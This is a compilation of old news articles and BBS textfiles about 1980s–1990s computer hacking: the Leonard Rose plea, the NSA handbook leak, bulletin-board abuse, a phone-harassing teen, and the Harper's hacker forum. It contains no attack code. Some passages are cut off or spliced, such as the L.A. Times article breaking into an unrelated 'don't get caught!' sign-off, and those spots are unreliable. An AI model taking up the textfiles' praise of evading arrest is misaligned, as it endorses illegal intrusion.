       "'Hacker' Pleads Guilty in AT&T CASE: Sentence Urged for
            Md. Man Among Stiffest Yet for Computer Crime"
              By Mark Potts/Washington Post Staff Writer
BALTIMORE, March 22--A computer "hacker" who was trying to help others
steal electronic passwords guarding large corporate computer systems
around the country today pleaded guilty to wire fraud in a continuing
government crackdown on computer crime.

Federal prosecutors recommended that Leonard Rose Jr., 32, of
Middletown, Md., be sent to prison for one year and one day, which
would be one of the stiffest sentences imposed to date for computer
crime. Sentencing is scheduled for May before U.S. District Judge J.
Frederick Motz.

Cases such as those of Rose and a Cornell University graduate student
who was convicted last year of crippling a nationwide computer network
have shown that the formerly innocent pastime of hacking has
potentially extreme economic ramifictions. Prosecutors, industry
officials and even some veteran hackers now question the once popular
and widely accepted practice of breaking into computer systems and
networks in search of information that can be shared with others.

"It's just like any other form of theft, except that it's more subtle
and it's more sophisticated," said Geoffrey R. Garinther, the
assistant U.S. attorney who prosecuted the Rose case.

Rose--once part of a group of maverick hackers who called themselves
the Legion of Doom--and his attorneys were not available for comment
after the guilty plea today. The single fraud count replaced a
five-count indictment of the computer programmer that was issued last
May after a raid on his home by Secret Service agents.

According to prosecutors, Rose illegally obtained information that
would permit him to secretly modify a widely used American Telephone &

(See HACKER, A10, Col 1)

Telegraph Co. Unix software program--the complex instructions that
tell computers what to do. The two former AT&T software emplyees who
provided these information "codes" have not yet been prosecuted.

Rose altered the AT&T software by inserting a "Trojan horse" program
that would allow a hacker to secretly gain access to the computer
systems usng the AT&T Unix softare and gather passwords used on the
system. The passwords could then be distributed to other hackers,
permitting them to use the system without the knowledge of its
rightful operators, prosecutors said.

Rose's modifications made corporate purchasers of the $77,000 AT&T
Unix program vulnerable to electronic break-ins and the theft of such
services as toll-free 800 numbers and other computer-based
telecommunications services.

After changing the software, Rose sent it to three other computer
hackers, including one in Chicago, where authorities learned of the
scheme through a Secret Service computer crime investigation called
Operation Sun Devil. Officials  say they do not believe the hackers
ever broke into computer systems.

At the same time he pleaded guilty here, Rose pleaded guilty to a
similar charge in Chicago; the sentences are to be served
concurrently, and he will be eligible for parole after 10 months.

Rose and his associates in the Legion of Doom, whose nickname was
taken from a gang of comic-book villains, used names like Acid Phreak
Terminus--Rose's nickname--as their computer IDs. They connected their
computers by telephone to corporate and government computer networks,
outwitted security screens and passwords to sign onto the systems and
rummaged through the information files they found, prosecutors said.

Members of the group were constantly testing the boundaries of the
"hacker ethic," a code of conduct dating back to the early 1960s that
operates on the belief that computers and the information on them
should be free for everyone to share, and that such freedom would
accelerate the spread of computer technology, to society's benefit.

Corporate and government computer information managers and many law
enforcement officials have a different view of the hackers.  To them,
the hackers are committing theft and computer fraud.

After the first federal law aimed at computer fraud was enacted in
1986, the Secret Service began the Operation Sun Devil investigation,
which has since swept up many members of the Legion of Doom, including
Rose. The investigation has resulted in the arrest and prosecution of
several hackers and led to the confiscation of dozens of computers,
thousands of computer disks and related items.

"We're authorized to enforce the computer fraud act, and we're doing
it to the best of our ability," Garry Jenkins, assistant director of
investigations for the Secret Service, said last summer.  "We're not
interested in cases that are at the lowest threshold of violating the
law...They have to be major criminal violations before we get
involved."

The Secret Service crackdown closely followed the prosecution of the
most celebrated hacker case to date, that of Robert Tappan Morris
Cornell Univesity computer science graduate student and son of a
computer sicentist at the Natonal Security Agency. Morris was
convicted early last year of infecting a vast nationawide computer
network in 1988 with a hugely disruptive computer "virus," or rogue
instructions. Although he could have gone to jail for five years, Mo
$10,000, given three years probation and ordered to do 400 hours of
community service work.

Through Operation Sun Devil and the Morris case, law enforcement
authorities have begun to define the boundaries of computer law.
Officials are grappling with how best to punish hackers and how to
differentiate between mere computer pranks and serious computer
espionage.

"We're all trying to get a handle for what is appropriate behavior in
this new age, where we have computers and computer networks linked
together," said Lance Hoffman, a computer science professor at George
Washington University.

"There clearly are a bunch of people feeling their way in various
respects," said David R. Johnson, an attorney at Wilmer, Cutler &
Pickering and an expert on computer law.  However, he said, "Things
are getting a lot clearer. It used to be a reasonably respectable
argument that people gaining unauthorized access to computer systems
and causing problems were just rambunctious youth." Now, however, the
feeling is that "operating in unauthorized computing spaces can be an
antisocial act," he said.

Although this view is increasingly shared by industry leaders, some
see the risk of the crackdown on hackers going to far. Among those
concerned is Mitch Kapor, the inventor of Lotus 1-2-3, the
best-selling computer "spreadsheet" program for carrying out
mathematical and accounting analysis.  Kapor and several other
computer pioneers last year contributed several hundred thousands
dollars to set up the Electron Freedom Foundation, a defense fund for
computer hackers.

EFF has funded much of Rose's defense and filed a friend-of-the-court
brief protesting Rose's indictment.

                          --end of article--

From: The Washington Post, Tuesday March 26, 1991, Page A3.

CORRECTION [to Saturday March 23, 1991 article]

"Leonard Rose, Jr., the Maryland computer hacker who pleaded guilty
last week to two counts of wire fraud involving his illegal possession
of an American Telephone & Telegraph Co. computer program, was not a
member of the "Legion of Doom" computer hacker group, as was reported
Saturday, and did not participate in the group's alleged activities of
breaking into and rummaging through corporate and government computer
systems."

Hackers retaliate by leaking manual

By Keay Davidson`
EXAMINER SCIENCE WRITER`   

Computer hackers waging what they say is a war against government
electronic snooping have distributed over international computer
networks a copy of the supersecret U.S. National Security Agency's
employee manual. The NSA manual, which was sent to dozens of news
organizations Tuesday, was distributed ""to embarrass the NSA'' and
prove that even the U.S. government's most covert agency can't keep
documents secret, said Grady Ward, a software designer from Arcata in
Humboldt County. Ward said the document initially appeared on a
Texas-based hackers network late last week, and he helped
redistribute it over other electronic networks. ""The intent is to
embarrass the NSA and demonstrate that even their own security manual
can be distributed,'' Ward said.    NSA officials said the document
is an unclassified employee handbook. Anyone seeking a copy of it
would need to file a Freedom of Information Act request, said NSA
spokeswoman Judi Emmel. The identity of the person who initially
obtained the document and how it was obtained was not clear. The
manual warns employees to safeguard the document: ""While you may
take this handbook home for further study, remember that is does
contain "FOR OFFICIAL USE ONLY' information which should be
protected. ... Appropriate administrative action will be taken to
determine responsibility and to apply corrective and/or disciplinary
measures in cases of unauthorized disclosure. .

   The document describes the basic goals and responsibilities of NSA
employees. Among the document's instructions:    ""Should strangers
or casual acquaintances question you about your place of employment,
an appropriate reply would be that you work for the Department of
Defense. If questioned further as to where you are employed within
the Department of Defense, you may reply, "NSA.' When you inform
someone that you work for NSA (or the Department of Defense) you may
expect that the next question will be, "What do you do?' ""It is a
good idea to anticipate this question and to formulate an appropriate
answer. Do not act mysteriously about your employment, as that would
only succeed in drawing more attention to yourself. .x

   ""If you are employed as a linguist, you may say that you are a
linguist, if necessary. However, you should not indicate the specific
language(s) with which you are involved.'' Ward told The Examiner he
obtained the document from an electronic computer ""magazine''
published in Texas. The magazine is accessible over the Internet, the
global data network that any computer user can access with a
computer, telephone and modem. Ward and others who have distributed
the document on electronic networks did so to undermine a federal
push for data-encryption regulations that would let the government
tap into computer networks, Ward said. In recent months, the Clinton
administration has pushed for future information systems to use a
microchip called the ""Clipper Chip,'' which would allow the
government, after receiving a court order, to tap any electronic
transmission. They government said the chip would allow it to monitor
criminal, espionage and terrorist activities. The plan is vehemently
opposed by personal computer users and groups such as the Electronic
Frontier Foundation, which fears the Clipper Chip could lead to
government snooping on private citizens' legitimate activities and
private lives.`
		     ========================================
		     =	  Abuse Hits Computer Networking    =
		     ========================================

Typed by   :Byte Rider
Actical by :William C. Rempel
From	   :L.A. Times Newspaper
Date	   :Aug 1, 1985
Subject    :Abuse with BBSes

  From Long Island, an electronic bulletin board is open to computer users who
want to share opinions about American foreign policy in Central America.  Gay
activists around the country can exchange information over several electronic in
San Francisco.	And a Texas-based white supremacist group that claims computer
technology is "Aryan technology" uses a computer network to disseminate racist
hate propaganda.

  These invisible networks, blending computer technology with the free speech
tradition of 18th-Century pamphleteering, represents America's newest
communications forums.

  Anyone with a computer equipped to send or recieve messages over a telephone
line can participate.  An electronic bulletin board is simply a computer that
can answer telephones and exchange messages with other computers.



1,500+ Boards in Use:

  Industry experts estimate that there are more than 1,500 computer bulletin
boards operated out of offices and homes across America, serving a potential
audience of about 1 million computer users equipped with telephone connectors
called modems.

  Doctors, business executives, engineers, Vietnam veterans and teen-agers are
among the growing number of bulletin board users sharing information or opinions
via computer on subjects ranging from famine in Africa, tax law changes or the
nuclear freeze movement to science, software or sports.

  But computer bulletin boards also are being used to exchange stolen credit
card numbers, to organize illicit sex rings and to offer advice on how to
assemble bombs or break into the data banks of credit bureaus, schools or
government agencies.



7 Teen-Agers Arrested

  Earlier this month, for example, New Jersey police arrested seven teen-agers
and closed down a bulletin board that published false credit card numbers,
details on how to assemble a pipe bomb and private telephone numbers to computer
systems in the Pentagon, a credit agency and a medical library.

  Two teen-agers in Monterey were arrested and their computers seized last April
after they posted extortion demands on an Encino bulletin board.

  This is a corner of the high-tech underworld, the world of "pirate" bulletin
boards where law enforcement investigators increasingly are finding clues to
such criminal activities as fraud and vandalism.

  "I guess it's like with anything else-there's always going to be someone who
abuses a good thing," Paul Zurkowski, president of the Information Industry
Assn.  in Washington, said.

  Corporations that have been victims of computer criminals-among them TRW Inc,
which operates a nationwide credit bureau out of Orange County, and MCI
Communications Corp., the long distance telephone service in Washington-now
monitor scores of underground bulletin boards daily.

  In a typical investigation last April, an undercover "hacker" at TRW spent
several days "lurking" in two New York-based bulletin boards-named Sherwood
Forest II and III-where the agent found a published appeal for credit cards with
credit limits of $5,000 to $25,000.  The message offered to pay cash or trade
Commodore computer software.

  A responce came three days later when another bulletin board patron using the
code name "Circuit Breaker" left a message that he had some credit card account
numbers to trade.  During that same period other Sherwood Forest patrons
published a stolen telephone credit card number, solicited help to gai
unauthorized entry to an insurance company computer and requested information on
how to make a bomb.

  TRW notified authorities, and Secret Service agents subsequently seized about
$25,000 in computers from two upstate New York teen-agers.  They Face federal
wire fraud charges.



Monitoring Efforts Pay Off

  In recent months, numerous arrest and confiscated computers have resulted from
the bulletin board monitoring programs of corporations and law enforcement
agencies.  Roger A.  Braham, TRW's security assurance supervisor, estimates that
at least 26 pirate bulletin boards have been closed down in the last year, about
half as a direct response to TRW-initiated investigations.

  Cats Den, a Boston-area bulletin boards, was shut down in February after a TRW
agent came upon published plans of a 14-year-old computer user to attempt to
sabotage the credit of another teenager's parents.  (TRW denied that sabotage
was possible.)

  Dragon Fire, the popular bulletin board of a well-to-do teen-ager in
Gainesville, TEX., was taken off-line in May after TRW found telephone credit
card numbers published as well as messages indicating that users in
Massachusetts planned to vandalize a high school there.

  And Farmers of Doom, a Denver-area bulletin board that routed its incoming
calls through a suburban public phone both to foil any tracing attempts, was
closed in May based on a tip from TRW agents.

  "We want them to know they're being watched," Braham, a retired Orange city
police investigator, said.

  The stepped-up campaign to intercept illegal computer activities prompted ne
hacker-calling himself "Doctor Who"-to warn in a recent electronic bulletin
board message to fellow hackers:  "This is way!!  Say .  .  .  away from TRW
untill it kools down."

  In California, legislation is pending that would make it unlawful to publish,
on a computer network, anyones unlisted phone number, credit card numbers or
computer access codes without their approval.  Bulletin boar operators who fail
to remove such private information after notifacation also would be liable in
the bill sponsored by State Sen.  John Doolittle (R-Citrus Heights).

  "Bulletin boards are great.  We'd like to encourage their use, but we're
concerned about the abuse of privacy," Ted Blanchard, legislative consultant
Doolittle, said.  "Everyone needs to understand the rules."



Originated in Chicago

  The nation's first electronic bulletin board is believed to have originated in
Chicago where two computer buffs set up a home-grown system on Feb.  16,
1978-still in the early days of the personal computer revolution.

  At first, they were the venue primarily of computer hobbyists who used the
message system to send out calls for assistance to solve technical programs.
Rapidly, their protential was recognized by national organizations and
professional groups such as doctors and engineers who set up computer networks
to organize conventions, share a variety of communications.

  Today electronic bulletin board networks are operated by such widely disparate
groups by such viduals as the Ku Klux Klan, an alleged prostitution ring in
Florida, scientists working with the national Areonautics and Space
Administration and local police agentcies in Arizona.  Almost anyone with a
personal computer can set up his own electronic bulletin board with investments
in readily avaliable electronics gear for as little as $2,000.

  "All you need is a cheap computer, the right software and a modem (that hooks
your computer to your telephone) and you're a bulletin board," Everick Bowens,
director of security for MCI and president of the newly formed Communications
Fraud Control Assn., said.

  While most bulletin board networks are small, many operated by large companies
such as CompuServe, Dialog and The Source-each of them major data base
providers-who monitor users of their bulletin boards.

  MCI routinely monitors bulletin boards to see if its long distance access
codes-popular among youths who call themselves "Phreakers"-are being distributed
illegally.

  Bowens said that the enforcement efforts has been largely effective, but one
side effect of success is that operators of pirate bulletin boards have become
more sophisticated and, therefore, more difficult to investigate.

  "A lot of these phreaks have gone
Special Thanks to:  The Prophet, for his excellent file:  Unix Use and Security
From the Ground Up.

The End, good luck, enjoy yourself, and don't get caught!

                                 Lord Lawless
                               Phortune 500/BOD

	    --This has been a Lord Lawless Presentation, (C) 1987.--



San Jose Mercury News, Thursday morning, October 5, 1989
 "COPS GOT HIS NUMBER"
"Teen accused of harassment calls via computer"
 
 The 16-year-old computer enthusiast loved to call people on the telephone
and  speaking through a voice synthesizer, talked like the devil.   Over
time, the boy harassed police departments from Cedar Rapids, Iowa, to
Hayward, and managed to rack up an estimated $170,000 in illegal calls,
authorities said.   In one day last year, the Los Angeles-area youth, whom
police would not identify by his real name, made 67 calls to the Hayward
Police Department.  And in a Los Angeles County town, dispatchers were
distracted durning several emergencies one evening while they answered his
crank calls for five hours.   But try as they might, neither law
enforcement officials nor an investigator at one telephone company that
was paying the bills could figure out who was doing it.   "He was, to be
frank about it, a pain in the ass," said Stan McClurg, a Cedar Rapids
detective." "He would call people and simply harass them."    Then in
early March, Kent, as he liked to call himself, spent five hours chatting
with dispatchers at the Hayward Police Department.    It was long enough
for authorities to trace the call all the way to his home in San Gabriel.
When police arrived that night, they found the teen-ager  in bed with his
Commodore 64, talking on the telephone.     Police say they can prove the
youth made about $2000 worth of fraudulent calls.  When he is arraigned
Oct, 16 he will be charged with fraud and making  two harrassing phone
calls, four bomb threats and interfering with the Hayward  Police and Los
Angeles Sheriff's Departments.     Sgt. Kammer of the Los Angeles Sheriffs
Department said the boy probably  got the long-distance calling codes from
a computer bulletin board, along  with numbers that would get him into the
phone mail systems of large companies. such as Sears Roebuck.     Once
inside, he ran thousands of combinations of numbers through his  computer,
leaving it on all day while he was away at school, police said.  When he
hit on codes that would get him into employees phone mail, he would
retrieve their messages and leave devilish ones of his own.      "The kid
was very, very bright kid, and he was very bored," Kammer said.  "He sat
up all night doing these things." 
                                                   ***********************************************************
** What the average High-School public thinks of hackers **
** Or: "My High School newspaper had an article about    **
** Hackers and here it is"                               **
**                                                       **
**                  By Argon PhoenixFire                 **
**                                                       **
**        Call the following Apple Corps boards:         **
**                                                       **
**          Outworld Cat-Fur [209] 532-6753              **
**       Metalland ][ AE/Fur [503] 253-5300 AE/Fur       **
**           Dragon's Weyr BBS [201] 992-0834            **
**   The Doctor's Office AE/BBS 10 meg [214] 296-3660    **
**           Kevin's Watch Cat-Fur [312] 897-4221        **
**  Restaurant At The End Of The Universe [609] 921-1994 **
**                                                       **
***********************************************************
 
  Thanks to the Master Rogue, sysop of REALM OF THE ROGUES BBS (415) 941-1990,
due to the fact I stole the messages from his board, as well as COMMANDER YAJ,
CRAZY KEV, and THE ANIMAL.
 
  Also thanks to BETA RAY BILL, who let me use his name in the article as long
as his name also got on the by-line.  Our real names have been deleted and
replaced with our handles.
 
  The reason for me to put this article into a textfile?  I don't know...maybe
you'll find it interesting.  It's a little thing I wrote for the school paper,
the WILDCAT, and gives a pretty objective view of us...  despite the fact that I 
had to slant it a little to get away from the administration...
 
But, on with the show....
 
 
Page 2                              FEATURE                  February 28,1985
-----------------------------------------------------------------------------
Good hackers...                                           ...don't get caught
 
                ENTERING THE REALM OF THE COMPUTER HACKERS
 
                  by Argon PhoenixFire and Beta Ray Bill
 
  The small clock-radio in the corner lights up the room with the time:  1:10
AM.  Through the door he stumbles, walking over to the impatient computer in the 
corner.  A switch is flipped, and the screen jumps to life with strange symbols. 
Fingers tap the plastic keys, typing out a long string of numbers and letters.
From the phone erupts a series of tones, and then a ringing sound can be heard.
A click halts the sound, and a high-pitched beep comes from the speaker.  From
his computer comes a slightly lower tone, and words begin appearing across the
screen, sent from another computer thousands of miles away.  That is the scene
that is replayed every night by the mysterious group known as hackers.  Who are
hackers?  Hackers are people who use their computers and a modem, which lets
them talk to other computers over normal phone lines.  Hackers are a very
exclusive group.  In fact, most hackers are males between the ages of 12 and 19. 
However, hackers are most well-known for their "illegal" dealings that they are
involved with.  Newsweek reporter Richard Sandza found that hackers don't like
nosy reporters, and he received conference calls and threats from many.  Last
week, a student at Homestead High School in the bay area was caught changing
grades at the school's computer for amounts of money.  Of course, most people in 
Tuolumne County thought the Hackers only existed in the big cities.  They were
wrong.  In fact, Sonora High School has had several hackers on campus in the
past and present years.  Does this mean that Sonora High students can look
forward to changing their grades with a friend's home computer?  "Right now,
It's not possible," said one local Hacker.  "The school doesn't have their
computer set up on an outside line.  In fact, we know the password to the
computer, but there's no way to call in." Most Hackers talk to each other on
computer "bulletin board systems" (BBS).  One of these systems is THE REALM OF
THE ROGUES in the San Francisco area.  Here's an example of what a Hacker would
see:
 
  You enter the door to the small room.  Inside, you hear the wind blow.  The
fog makes things hard to see, but you can make out what is on the shining sign
that floats above your head:
 
  Welcome to The Realm Of the Rogues.
 
  Enter your password or hit >RETURN<
 
  (Each hacker has his own password, so they can't call as each other and annoy
one another)
 
Consulting the scrolls of membership...
   User #18387:  BETA RAY BILL
    Logon time:  1:14:38 AM
 
  The following are messages from actual hackers on THE REALM.  Some have been
edited for language and space.
 
From COMMANDER YAJ on Feb 13,1:48 PM
 
  Someone in Cupertino has been arrested for trying to break into Stanford to
try and change high school grades for money.  Let's be careful out there.
 
From THE ANIMAL on Feb 14,8:10 AM
 
  The person who is being charged for attempting to break into the Stanford
computer to change grades is a good friend of mine.  He isn't the one who should 
be busted but someone else is!!  I hope that justice will prevail and the person 
responsible will learn a lesson!
 
From KRAZY KEV on Feb 16,8:36 PM
 
  ANIMAL...THE AMERICAN JUDICIAL SYSTEM IS CORRUPTED.  THERE IS NO WAY YOUR
FRIEND WILL BE LET OFF THE HOOK.  (I'M SORRY TO SAY) I HAVE NO FAITH IN OUR
SYSTEM AND NEVER WILL, UNTIL THE DEATH SENTENCE IS A LAW IN ALL STATES.  AS FOR
YOUR FRIEND, I HOPE HE'S O.K.
 
From THE ANIMAL on Feb 17,7:42 AM
 
  Well so far my friend went to a hearing and it turns out that all they are
going to do is expel him from school.  He hasn't gone to court yet but that
shouldn't be too bad.  Good hackers should never be busted!  That is why they
are called "Good" hackers, right?  Only the hackers that make little mistakes
are the ones who get caught.  If you make a mistake,you deserve to get caught
for your own good!
 
  << The rest of the article was but a plug for the next in the 2-part series on 
hackers, was written by Beta Ray, and really sucked, was all lies, and so I
won't show it to you.  Soon he'll have his //C and modem working, so no doubt
you'll see him leeching.
 
And so ends the article. Thanks again to THE REALM OF THE ROGUES.
 
[Argon PhoenixFire/Apple Corps]
 
Outworld Cat-Fur    (209) 532-6753
Yukon Country BBS   (718) 627-5874
THE TARDIS BBS      (609) 448-1361
REALM OF THE ROGUES (415) 941-1990
 
*****************************************************************************
*                                                                           *
*            From the March 1990 edition of Harper's Magazine               *
*                                                                           *
*                     IS COMPUTER HACKING A CRIME?                          *
*                                                                           *
*                     Typed by Warlock, March 13.                           *
*                                                                           *
*****************************************************************************

    The image of the computer hacker drifted into public awareness in the
middle Seventies, when reports of Chinese-food-consuming geniuses working
compulsively at keyboards began to issue from MIT.  Over time, several of
these impresarios entered commerce, and the public's impression of hackers
changed:  They were no longer nerds but young, millionaire entrepreneurs.
    The most recent news reports have given the term a more felonious
connotation.  Early this year, a graduate student named Robert Morris Jr. went
on trial for releasing a computer program known as a worm into the vast
Internet system, halting more than 6,000 computers.  The subsequent public
debate ranged from the matter of proper punishment for a mischievous kid to
the issue of our rapidly changing notion of what constitutes free speech -- or
property -- in an age of modems and data bases.  In order to allow hackers to
speak for themselves, Harper's Magazine recently organized an electronic
discussion and asked some of the nation's best hackers to "log on," discuss
the protean notions of contemporary speech, and explain what their powers and
talents are.

The following forum is based on a discussion held on the WELL, a computer
bulletin board system based in Sausalito, California.  The forum is the result
of a gradual accretion of arguments as the participants -- located throughout
the country -- opined and reacted over an eleven day period.  Harper's Magazine
senior editor Jack Hitt and assistant editor Paul Tough served as moderators.

ADELAIDE is a pseudonym for a former hacker who has sold his soul to the
corporate state as a computer programmer.

BARLOW is John Perry Barlow, a retired cattle rancher, a former Republican
county chairman, and a lyricist for the Grateful Dead, who currently is
writing a book on computers and consciousness entitled Everything We Know Is
Wrong.

BLUEFIRE is Dr. Robert Jacobson, associate director of the Human Interface
Technology Laboratory at the University of Washington and a former
information-policy analyst with the California legislature.

BRAND is Russell Brand, a senior computer scientist with Reasoning Systems, in
Palo Alto, California.

CLIFF is Clifford Stoll, the astronomer who caught a spy in a military computer
network and recently published an account of his investigation entitled The
Cuckoo's Egg.

DAVE is Dave Hughes, a retired West Pointer who currently operates his own
political bulletin board.

DRAKE is Frank Drake, a computer-science student at a West Coast university and
the editor of W.O.R.M., a cyberpunk magazine.

EDDIE JOE HOMEBOY is a pseudonym for a professional software engineer who has
worked at Lucasfilm, Pyramid Technology, Apple Computer, and Autodesk.

EMMANUEL GOLDSTEIN is the editor of 2600, the "hacker's quarterly."

HANK is Hank Roberts, who builds mobiles, flies hang gliders, and proofreads
for the Whole Earth Catalog.

JIMG is Jim Gasperini, the author, with TRANS Fiction Systems, of Hidden
Agenda, a computer game that simulates political conflict in Central America.

JRC is Jon Carroll, daily columnist for the San Francisco Chronical and
writer-in-residence for the Pickle Family Circus, a national traveling circus
troupe based in San Francisco.

KK is Kevin Kelly, editor of the Whole Earth Review and a cofounder of the
Hacker's Conference.

LEE is Lee Felstein, who designed the Osborne-1 computer and cofounded the
Homebrew Computer Club.

MANDEL is Tom Mandel, a professional futurist and an organizer of the Hacker's
Conference.

RH is robert Horvitz, Washington correspondent for the Whole earth Review.

RMS is Richard Stallman, founder of the Free Software Foundation.

TENNEY is Glenn Tenney, an independant-systems architect and an organizer of
the Hacker's Conference.

ACID PHREAK and PHIBER OPTIK are both pseudonyms for hackers who decline to be
identified.

                             A Hacker's Lexicon

Back Door:  A point of entry into a computer system -- often installed there by
the original programmer -- that provides secret access.

Bomb:  A destructive computer program, which, when activated, destroys the
files in a computer system.

Chipper:  A hacker who specializes in changing the programming instructions of
computer chips.

Cracker:  A hacker who breaks illegally into computer systems and creates
mischief; often used pejoratively.  The original meaning of cracker was
narrower, describing those who decoded copyright-protection schemes on
commercial software products or to modify them; sometimes known as a software
pirate.

Hacker:  Originally, a compulsive computer programmer.  The word has evolved in
meaning over the years.  Among computer users, hacker carries a positive
connotation, meaning anyone who creatively explores the operations of computer
systems.  Recently, it has taken on a negative connotation, primarily through
confusion with cracker.

Phone phreak:  One who explores the operations of the phone system, often with
the intent of making free phone calls.

Social engineering:  A nontechnical means of gaining information simply by
persuading people to hand it over.  If a hacker wished to gain access to a
computer system, for example, an act of social engineering might be able to
contact a system operator and to convince him or her that the hacker is a
legitimate user in need of a password; more colloquially, a con job.

Virus:  A program that, having been introduced into a system, replicates itself
and attaches itself to other programs, often with a variety of mischievous
effects.

Worm:  A destructive program that, when activated, fills a computer system with
self-replicating information, clogging the system so that its operations are
severely slowed, sometimes stopped.

                          The Digital Frontier

HARPER'S [Day 1, 9:00 A.M.]:  When the computer was young, the word hacking was
used to describe the work of brilliant students who explored and expanded the
uses to which this new technology might be employed.  There was even talk of a
"hacker ethic."  Somehow, in the succeeding years, the word has taken on dark
connotations, suggestion the actions of a criminal.  What is the hacker ethic,
and does it survive?

ADELAIDE [Day 1, 9:25 A.M.]:  the hacker ethic survives, and it is a fraud.  It
survives in anyone excited by technology's power to turn many small,
insignificant things into one vast, beautiful thing.  It is a fraud because
there is nothing magical about computers that causes a user to undergo
religious conversion and devote himself to the public good.  Early automobile
inventors were hackers too.  At first the elite drove in luxury.  Later
practically everyone had a car.  Now we have traffic jams, drunk drivers, air
pollution, and suburban sprawl.  The old magic of an automobile occasionally
surfaces, but we possess no delusions that it automatically invades the
consciousness of anyone who sits behind the wheel.  Computers are power, and
direct contact with power can bring out the best or worst in a person.  It's
tempting to think that everyone exposed to the technology will be grandly
inspired, but, alas, it just ain't so.

BRAND [Day 1, 9:54 A.M.]  The hacker ethic involves several things.  One is
avoiding waste; insisting on using idle computer power -- often hacking into a
system to do so, while taking the greatest precautions not to damage the
system.  A second goal of many hackers is the free exchange of  technical
information.  These hackers feel that patent and copyright restrictions slow
down technological advances.  A third goal is the advancement of human
knowledge for its own sake.  Often this approach is unconventional.  People we
call crackers often explore systems and do mischief.  The are called hackers by
the press, which doesn't understand the issues.

KK [Day 1, 11:19 A.M.]:  The hacker ethic went unnoticed early on because the
explorations of basement tinkerers were very local.  Once we all became
connected, the work of these investigations rippled through the world.  today
the hacking spirit is alive and kicking in video, satellite TV, and radio.  In
some fields they are called chippers, because the modify and peddle altered
chips.  Everything that was once said about "phone phreaks" can be said about
them too.

DAVE [Day 1, 11:29 A.M.]:  Bah.  Too academic.  Hackers hack.  Because the want
to.  Not for any higher purpose.  Hacking is not dead and won't be as long as
teenagers get their hands on the tools.  There is a hacker born every minute.

ADELAIDE [Day 1, 11:42 A.M.]:  Don't forget ego.  People break into computers
because it's fun and it makes them feel powerful.

BARLOW [Day 1, 11:54 A.M.]:  Hackers hack.  Yeah, right, but what's more to the
point is that humans hack and always have.  Far more than just opposable
thumbs, upright posture, or excess cranial capacity, human beings are set apart
from all other species by an itch, a hard-wired dissatisfaction. Computer
hacking is just the latest in a series of quests that started with fire
hacking.  Hacking is also a collective enterprise.  It brings to our joint
endeavors the simultaneity that other collective organisms -- ant colonies,
Canada geese -- take for granted.  This is important, because combined with our
itch to probe is a need to connect.  Humans miss the almost telepathic
connectedness that I've observed in other herding mammals.  And we want it
back.  Ironically, the solitary sociopath and his 3:00 A.M. endeavors hold the
most promise for delivering species reunion.

EDDIE JOE HOMEBOY [Day 1, 4:44 P.M.]:  Hacking really took hold with the advent
of the personal computer, which freed programmers from having to use a big
time-sharing system.  A hacker could sit in the privacy of his home and hack to
his heart's and head's content.

LEE [Day 1, 5:17 P.M.]:  "Angelheaded hipsters burning for the ancient heavenly
connection to the starry dynamo in the machinery of night" (Allen Ginsberg,
"Howl").  I still get an endorphin rush when I go on a design run -- my mind
out over the edge, groping for possibilities that can be sensed when various
parts are held in juxtaposition with a view toward creating a whole object:
straining to get through the epsilon-wide crack between What Is and What Could
Be.  Somewhere there's the Dynamo of Night, the ultra-mechanism waiting to be
dreamed, that we'll never get to in actuality, (think what is would weigh!) but
that's present somehow in the vicinity of those mental wrestling matches. When
I re-emerge into the light of another day with the design on paper -- and with
the knowledge that if it ever gets built, things will never be the same again
-- I know I've been where artists go.  That's hacking to me: to transcend
custom and to engage in creativity for its own sake, but also to create
objective effects.  I've been around long enough to see the greed creeps take
up the unattended reins of power and shut down most of the creativity that put
them where they are.  But I've also seen things change, against the best
efforts of a stupidly run industry.  We cracked the egg out from under the
Computer Priesthood, and now everyone can have omelets.

RMS [Day 1, 5:19 P.M.]:  The media and the courts are spreading a certain image
of hackers.  It's important for us not to be shaped by that image.  But there
are two ways that it can happen.  One way is for hackers to become part of the
security-maintenance establishment.  The other, more subtle, way is for a
hacker to become the security-breaking phreak the media portray.  By shaping
ourselves into the enemy of the establishment, we uphold the establishment. But
there's nothing wrong with breaking security if you're accomplishing something
useful.  It's like picking a lock on a tool cabinet to get a screwdriver to fix
your radio.  As long as you put the screwdriver back, what harm does it do?

ACID PHREAK [Day 1, 6:34 P.M.]:  There is no one hacker ethic.  Everyone has
his own.  To say that we all think the same way is preposterous.  The hacker
of old sought to find what the computer itself could do.  There was nothing
illegal about that.  Today, hackers and phreaks are drawn to specific, often
corporate, systems.  It's no wonder everyone on the other side is getting mad.
We're always one step ahead.  We were back then, and we are now.

CLIFF [Day 1, 8:38 P.M.]:  RMS said, "There's nothing wrong with breaking
security if you're accomplishing something useful."  Huh?  How about, There's
nothing wrong with entering a neighbor's house if you're accomplishing
something useful, just as long as you clean up after yourself.  Does my
personal privacy mean anything?  Should my personal letters and data be open to
anyone who knows how to crack passwords?  If not my property, then how about a
bank's?  Should my credit history be available to anyone who can find a back
door to the private computers of TRW, the firm that tracks people's credit
histories?  How about a list of AIDS patients from a hospital's data bank?  Or
next week's prime interest rate from a computer at the Treasury Department?

BLUEFIRE [Day 1, 9:20 P.M.]:  Computers are everywhere, and they link us
together into a vast social "cybernetia."  The grand skills of the hackers,
formidable though they may have been, are incapable of subverting this
automated social order.  The networks in which we survive are more than copper
wire and radio waves: They are the social organization.  For every hacker in
revolt, busting through a security code, ten thousand people are being wired up
with automatic call-identification and credit-checking machines.  Long live the
Computer Revolution, which died aborning.

JRC [Day 1, 10:28 P.M.]:  We have two different definitions here.  One speaks
of a tinkerer's ecstasy, an ecstasy that is hard to maintain in the corporate
world but is nevertheless at the heart of Why Hackers Hack.  The second is
political, and it has to do with the free flow of information.  Information
should flow more freely (how freely is being debated), and the hacker can make
it happen because the hacker knows how to undam the pipes.  This makes the
hacker ethic -- of necessity -- antiauthoritarian.

EMMANUEL GOLDSTEIN [Day 2, 2:41 A.M.]:  It's meaningless what we call
ourselves: hackers, crackers, techno-rats.  We're individuals who happen to
play with high tech.  There is no hacker community in the traditional sense of
the term.  There are no leaders and no agenda.  We're just individuals out
exploring.

BRAND [Day 2, 9:02 A.M.]:  There are two issues: invariance and privacy.
Invariance is the art of leaving things as you found them.  If someone used my
house for the day and left everything as he found it so that there was no way
to tell he had been there, I would see no problem.  With a well-run computer
system, we can assure invariance.  Without this assurance we must fear that the
person picking the lock to get the screwdriver will break the lock, the
screwdriver, or both.  Privacy is more complicated.  I want my medical records,
employment records, and letters to The New Republic private because I fear that
someone will do something with the information that is against my interests.
If I could trust people not to do bad things with information, I would not need
